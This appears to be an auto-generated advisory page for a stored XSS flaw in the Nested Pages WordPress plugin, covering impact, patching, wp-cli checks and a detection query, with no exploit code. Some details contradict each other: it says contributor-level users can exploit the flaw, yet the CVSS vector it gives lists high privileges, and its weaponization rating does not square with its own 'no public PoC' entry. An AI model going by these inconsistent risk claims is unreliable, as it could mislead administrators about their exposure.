CVE-2025-0718 – The Nested Pages WordPress plugin before versio... (How to Fix)

Q: What is the severity of CVE-2025-0718?

CVE-2025-0718 has a CVSS score of 4.8 (MEDIUM). The Nested Pages WordPress plugin before version 3.2.13 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated users with contributor-level privileges or higher to inject malicious scripts that execute when other users view affected pages. The vulnerability bypasses WordPress's unfiltered_html restriction, making it particularly dangerous in multisite installations.

📋 TL;DR

The Nested Pages WordPress plugin before version 3.2.13 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated users with contributor-level privileges or higher to inject malicious scripts that execute when other users view affected pages. The vulnerability bypasses WordPress's unfiltered_html restriction, making it particularly dangerous in multisite installations.

💻 Affected Systems

Products:

WordPress Nested Pages plugin

Versions: All versions before 3.2.13

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires WordPress multisite setup or configuration where unfiltered_html capability is disallowed for the vulnerability to be exploitable.

📦 What is this software?

Nested Pages by Kylephillips

View all CVEs affecting Nested Pages →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Malicious contributor could inject scripts that steal administrator credentials, redirect users to malicious sites, or perform actions as other users when they view compromised pages.

🟠

Likely Case

Authenticated attackers with contributor access inject malicious JavaScript that executes in victims' browsers when viewing plugin settings pages, potentially stealing session cookies or performing unauthorized actions.

🟢

If Mitigated

With proper user access controls and regular plugin updates, impact is limited to low-privilege script injection that may be blocked by modern browser security features.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires contributor-level access or higher. The vulnerability is in plugin settings, making it straightforward to exploit once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.2.13

Vendor Advisory: https://wpscan.com/vulnerability/69ddd8eb-33f1-49cf-9428-3d89262b1887/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find Nested Pages plugin. 4. Click 'Update Now' if available. 5. Alternatively, download version 3.2.13+ from WordPress repository and manually update.

🔧 Temporary Workarounds

Temporary plugin deactivation

all

Disable the Nested Pages plugin until patched

wp plugin deactivate nested-pages

Restrict user capabilities

all

Temporarily remove contributor role or restrict plugin access

🧯 If You Can't Patch

Implement strict user access controls and limit contributor privileges
Enable WordPress security plugins with XSS protection and input validation

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > Nested Pages for version number below 3.2.13

Check Version:

wp plugin get nested-pages --field=version

Verify Fix Applied:

Confirm plugin version is 3.2.13 or higher in WordPress admin

📡 Detection & Monitoring

Log Indicators:

Unusual plugin setting modifications by contributor users
JavaScript injection patterns in plugin settings

Network Indicators:

Unexpected script loads from plugin settings pages

SIEM Query:

source="wordpress" AND (event="plugin_settings_update" OR event="plugin_modified") AND user_role="contributor" AND plugin="nested-pages"

📊 Metadata

CVE ID: CVE-2025-0718

CVSS v3 Score: 4.8 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.07% exploit probability (21.6th percentile)

Published: March 23, 2025

Last Updated: April 2, 2025

🔗 References

https://wpscan.com/vulnerability/69ddd8eb-33f1-49cf-9428-3d89262b1887/ Exploit,Third Party Advisory
https://wpscan.com/vulnerability/69ddd8eb-33f1-49cf-9428-3d89262b1887/ Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-0718, you might also want to check these: